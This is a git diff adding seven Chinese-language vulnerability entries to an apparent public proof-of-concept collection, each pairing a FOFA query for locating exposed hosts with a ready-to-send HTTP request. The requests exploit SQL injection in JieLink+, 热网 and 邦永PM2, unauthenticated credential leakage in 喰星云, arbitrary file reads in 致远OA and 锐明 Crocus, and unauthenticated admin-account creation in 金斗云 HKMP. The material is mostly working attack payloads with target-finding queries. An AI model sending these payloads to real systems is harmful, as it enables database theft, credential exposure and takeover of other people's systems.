diff --git a/JieLink+智能终端操作平台存在sql注入漏洞.md b/JieLink+智能终端操作平台存在sql注入漏洞.md new file mode 100644 index 0000000..d02d4a3 --- /dev/null +++ b/JieLink+智能终端操作平台存在sql注入漏洞.md @@ -0,0 +1,29 @@ +## JieLink+智能终端操作平台存在sql注入漏洞 + +jieLink+智能终端操作平台deviceId参数存在sql注入漏洞,攻击者利用此漏洞可导致数据库的敏感信息泄露。 + +## fofa + +``` +title="JieLink+智能终端操作平台" +``` + +## poc + +``` +POST /mobile/Remote/GetParkController HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0 +Accept: application/json, text/plain, */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Connection: close +Cookie: DefaultSystem=Mobile; ASP.NET_SessionId=533gfzuselgriachdgogkug5 +Content-Type: application/x-www-form-urlencoded +Content-Length: 66 + +deviceId=1'and/**/extractvalue(1,concat(char(126),database()))and' +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407031649500.png) \ No newline at end of file diff --git a/README.md b/README.md index 5a48977..f0909a1 100644 --- a/README.md +++ b/README.md @@ -15,6 +15,13 @@ - 英飞达医学影像存档与通信系统Upload.asmx任意文件上传漏洞 - GeoServer属性名表达式前台代码执行漏洞(CVE-2024-36401) - D-LINK-Go-RT-AC750 GORTAC750_A1_FW_v101b03存在硬编码漏洞(CVE-2024-22853) +- 致远OA-A8-V5接口officeservlet存在任意文件读取漏洞 +- JieLink+智能终端操作平台存在sql注入漏洞 +- 金斗云-HKMP智慧商业软件任意用户添加漏洞 +- 热网无线监测系统SystemManager.asmx存在SQL注入漏洞 +- 喰星云-数字化餐饮服务系统listuser信息泄露漏洞 +- 邦永PM2项目管理系统Global_UserLogin.aspx存在SQL注入漏洞 +- 锐明技术Crocus系统Service.do任意文件读取漏洞 ## 2024.06.28 新增漏洞 diff --git a/喰星云-数字化餐饮服务系统listuser信息泄露漏洞.md b/喰星云-数字化餐饮服务系统listuser信息泄露漏洞.md new file mode 100644 index 0000000..ba04d7e --- /dev/null +++ b/喰星云-数字化餐饮服务系统listuser信息泄露漏洞.md @@ -0,0 +1,22 @@ +## 喰星云-数字化餐饮服务系统listuser信息泄露漏洞 + +喰星云·数字化餐饮服务系统 listuser 接口处存在信息泄露漏洞,未经身份验证的远程攻击者可利用此漏洞读取后台管理员账号密码登录凭证信息,导致后台权限被控,造成信息泄露,使系统处于极不安全的状态。 + +## fofa + +``` +body="tmp_md5_pwd" +``` + +## poc + +``` +GET /chainsales/head/user/listuser HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept: */* +Connection: keep-alive +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407031710747.png) \ No newline at end of file diff --git a/热网无线监测系统SystemManager.asmx存在SQL注入漏洞.md b/热网无线监测系统SystemManager.asmx存在SQL注入漏洞.md new file mode 100644 index 0000000..b1ec5da --- /dev/null +++ b/热网无线监测系统SystemManager.asmx存在SQL注入漏洞.md @@ -0,0 +1,26 @@ +## 热网无线监测系统SystemManager.asmx存在SQL注入漏洞 + +热网无线监测系统 SystemManager.asmx 接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + +## fofa + +``` +body="Downloads/HDPrintInstall.rar" || body="skins/login/images/btn_login.jpg" +``` + +## poc + +``` +POST /DataSrvs/SystemManager.asmx/UpdateWUT HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept: */* +Accept-Language: en-US;q=0.9,en;q=0.8 +Content-Type: application/x-www-form-urlencoded +Connection: close + +id=%28SELECT+CHAR%28113%29%2BCHAR%28120%29%2BCHAR%28118%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28CASE+WHEN+%281675%3D1675%29+THEN+@@version+ELSE+CHAR%2848%29+END%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28113%29%29&name=&desc= +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407031708136.png) \ No newline at end of file diff --git a/致远OA-A8-V5接口officeservlet存在任意文件读取漏洞.md b/致远OA-A8-V5接口officeservlet存在任意文件读取漏洞.md new file mode 100644 index 0000000..71db7c9 --- /dev/null +++ b/致远OA-A8-V5接口officeservlet存在任意文件读取漏洞.md @@ -0,0 +1,49 @@ +## 致远OA-A8-V5接口officeservlet存在任意文件读取漏洞 + +## fofa + +``` +app="致远互联-OA" && product="致远A8" +``` + +## poc + +读取`./../../base/conf/datasourceCtp.properties`路径下的数据库配置文件 + +```yaml +POST /seeyon/officeservlet HTTP/1.1 +Host: xxxx +Pragma: no-cache +Cache-Control: no-cache +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cookie: JSESSIONID=98FCAEBB95CCBEB2C7209BEF7EAA7B3E; loginPageURL= +x-forwarded-for: 127.0.0.1 +x-originating-ip: 127.0.0.1 +x-remote-ip: 127.0.0.1 +x-remote-addr: 127.0.0.1 +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 350 + +DBSTEP V3.0 285 0 0 +RECORDID=wLoi +CREATEDATE=wLehP4whzUoiw=66 +originalFileId=wLoi +needReadFile=yRWZdAS6 +originalCreateDate=wLehP4whzUoiw=66 +OPTION=LKDxOWOWLlxwVlOW +TEMPLATE=qf85qf85qfDfeazQqAzvcRevy1W3eazvNaMUySz3d7TsdRDsyaM3nYli +COMMAND=BSTLOlMSOCQwOV66 +affairMemberId=wLoi +affairMemberName=wLoi +``` + +![image-20230426151343095](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407030924382.png) + +使用工具解密 `https://github.com/wafinfo/DecryptTools` + +![image-20240703092430361](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407030924444.png) \ No newline at end of file diff --git a/邦永PM2项目管理系统Global_UserLogin.aspx存在SQL注入漏洞.md b/邦永PM2项目管理系统Global_UserLogin.aspx存在SQL注入漏洞.md new file mode 100644 index 0000000..f1451c2 --- /dev/null +++ b/邦永PM2项目管理系统Global_UserLogin.aspx存在SQL注入漏洞.md @@ -0,0 +1,25 @@ +## 邦永PM2项目管理系统Global_UserLogin.aspx存在SQL注入漏洞 + +邦永PM2项目管理系统/Global/Global_UserLogin.aspx存在SQL注入漏洞,导致数据泄露。 + +## fofa + +``` +body="PM2项目管理系统BS版增强工具.zip" +``` + +## poc + +``` +GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode=&password=&type= HTTP/1.1 +Host: your-ip +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0 +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407031715215.png) + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407031715529.png) \ No newline at end of file diff --git a/金斗云-HKMP智慧商业软件任意用户添加漏洞.md b/金斗云-HKMP智慧商业软件任意用户添加漏洞.md new file mode 100644 index 0000000..50da4ba --- /dev/null +++ b/金斗云-HKMP智慧商业软件任意用户添加漏洞.md @@ -0,0 +1,22 @@ +## 金斗云-HKMP智慧商业软件任意用户添加漏洞 + +金斗云 HKMP智慧商业软件 /admin/user/add 接口存在任意用户创建漏洞,未经身份验证的远程攻击者可以利用此漏洞创建管理员账户,从而接管系统后台,造成信息泄露,导致系统处于极不安全的状态。 + +## fofa + +``` +body="金斗云 HKMP" +``` + +## poc + +``` +POST /admin/user/add HTTP/1.1 +Content-Type: application/json +Host: + +{"appId":"hkmp","mchId":"hkmp","deviceId":"hkmp","timestamp":1719305067, +"nonce":2287791269,"sign":"hkmp","data":{"userCode":"te1","userName":"te1","password":"123456","privilege":["1000","8000","8010","2000","2001","2010","7000"],"adminUserCode":"admin","adminUserName":"系统管理员"}} +``` + +![image-20240703170217938](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407031702984.png) \ No newline at end of file diff --git a/锐明技术Crocus系统Service.do任意文件读取漏洞.md b/锐明技术Crocus系统Service.do任意文件读取漏洞.md new file mode 100644 index 0000000..9c62caa --- /dev/null +++ b/锐明技术Crocus系统Service.do任意文件读取漏洞.md @@ -0,0 +1,25 @@ +## 锐明技术Crocus系统Service.do任意文件读取漏洞 + +锐明技术Crocus系统 Service.do接口存在任意文件读取漏洞,未经过身份验证的远程攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。 + +## fofa + +``` +body="/ThirdResource/respond/respond.min.js" && title="Crocus" +``` + +## poc + +``` +GET /Service.do?Action=Download&Path=C:/windows/win.ini HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Connection: close +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407031718375.png) \ No newline at end of file